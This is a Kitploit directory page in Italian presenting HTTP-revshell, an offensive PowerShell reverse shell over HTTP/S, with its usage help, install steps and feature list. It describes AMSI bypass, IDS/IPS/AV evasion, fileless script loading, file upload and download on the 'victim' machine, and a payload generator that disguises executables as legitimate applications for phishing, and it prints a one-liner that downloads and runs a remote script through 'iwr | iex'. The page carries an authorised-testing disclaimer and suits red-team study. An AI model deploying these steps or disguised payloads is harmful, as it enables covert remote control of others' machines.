Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
HTTP-revshell — Reverse shell in PowerShell che utilizza il protocollo HTTP/S con bypass di AMSI e supporto proxy | Kitploit
Strumenti/GitHubGitHub/3v4si0n/http-revshell
Strumenti di PhishingGenerazione di PayloadEvasione IDS/IPSPost-ExploitCommand and ControlRed TeamingStrumento di Accesso Remoto
GitHub3v4si0n/http-revshell

HTTP-revshell

Reverse shell in PowerShell che utilizza il protocollo HTTP/S con bypass di AMSI e supporto proxy

Vedi Repository
598901 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Powershell HTTP/S Reverse Shell

Category-tool Powershell Python License

HTTP-revshell è uno strumento focalizzato su esercizi di redteam e penetration tester. Questo strumento fornisce una connessione inversa attraverso il protocollo http/s. Utilizza un canale nascosto per ottenere il controllo della macchina vittima tramite richieste web e quindi eludere soluzioni come IDS, IPS e AV.

NOTA: Lo strumento non sarà mantenuto in termini di evasione. Con pochi cambiamenti puoi bypassare molti EDR presenti sul mercato.

HTTP-revshell

Aiuto server.py

Server usage:

root@kitploit:~
usage: server.py [-h] [--ssl] [--autocomplete] host port

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions

Aiuto Invoke-WebRev.ps1 (client)

Client usage:

root@kitploit:~
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

Installazione

root@kitploit:~
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

Funzionalità

  • SSL
  • Proxy Aware
  • Carica file
  • Scarica file
  • Carica script PowerShell attraverso il server
  • Controllo errori
  • Bypass AMSI
  • Autocomplete funzioni PowerShell (opzionale)

Utilizzo funzioni extra

Upload

Questa funzione ti permette di caricare qualsiasi file sulla macchina vittima.

Usage:

root@kitploit:~
upload /src/path/file C:\dest\path\file

Download

Questa funzione ti permette di scaricare un file sulla macchina dell'attaccante.

Usage:

root@kitploit:~
download C:\src\path\file /dst/path/file

Loadps1

Questa funzione ti permette di caricare script PowerShell senza dover scrivere sul disco della vittima, leggendo il file attraverso traffico HTTP legittimo.

Usage:

root@kitploit:~
loadps1 /path/to/the/local/server/PowershellScript.ps1

Aiuto Revshell-Generator.ps1 (Generatore Automatico di Payload)

Questo script ti permette di creare un file eseguibile con il payload necessario per usare HTTP-revshell, devi solo seguire le istruzioni sullo schermo per generarlo. Ci sono 6 template predefiniti e uno personalizzabile, con i dati che preferisci.

I payload generati dallo strumento incorporano l'icona legittima dell'applicazione, così come le informazioni sul prodotto e sul copyright dell'applicazione originale. Inoltre, ciascuno di essi apre l'applicazione originale prima di stabilire la connessione con il server, fingendo di essere un'applicazione legittima. Questo può essere usato per phishing o esercizi di Red Team.

Payload Generator usage:

root@kitploit:~
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

Revshell-Generator

IMPORTANTE: Tutti i campi nei template predefiniti vengono completati automaticamente premendo il tasto Invio.

Crediti

  • JoelGMSec per il suo fantastico Revshell-Generator.ps1. Twitter: @JoelGMSec
  • dev-2null per aver segnalato il primo bug. Twitter: @dev2null

Dichiarazione di non responsabilità e Licenza

Questo script è concesso in licenza LGPLv3+. Link diretto alla Licenza.

HTTP-revshell dovrebbe essere utilizzato solo per test di penetrazione autorizzati e/o scopi educativi senza scopo di lucro. Qualsiasi uso improprio di questo software non sarà di responsabilità dell'autore o di qualsiasi altro collaboratore. Usalo sui tuoi server e/o con il permesso del proprietario del server.

Scarica lo strumento